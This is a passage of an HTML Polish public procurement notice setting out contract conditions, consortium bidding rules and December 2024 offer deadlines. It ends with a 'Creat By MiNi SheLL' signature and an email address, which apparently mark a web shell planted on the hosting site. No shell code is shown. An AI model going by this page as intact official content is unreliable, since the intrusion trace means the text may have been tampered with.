rzeczywisty dostęp do tych zasobów i określa w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>2) sposób i okres udostępniania wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia,3) czy i w jakim zakresie podmiot udostępniający, na zdolnościach którego wykonawca polega w odniesieniu do warunków<br/>udziału w postępowaniu dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia, zrealizuje usługi, których wskazane<br/>zdolności dotyczą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> wspólnie muszą wykazać, że wspólnie spełniają warunki udziału w postępowaniu,<br/>2) w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia<br/>z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt. 4 ustawy Pzp,<br/>3) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie<br/>3) muszą ustanowić pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia.<br/>Pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzona przez notariusza,<br/>4) przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako<br/>najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych wykonawców,<br/>5) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie, z którego<br/>będzie wynikać, jakie usługi wykonają poszczególni wykonawcy,<br/>6) przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzania zawarto w załączniku Nr 4 do SWZ pn. Projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-19 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gaworzyce</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-19 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com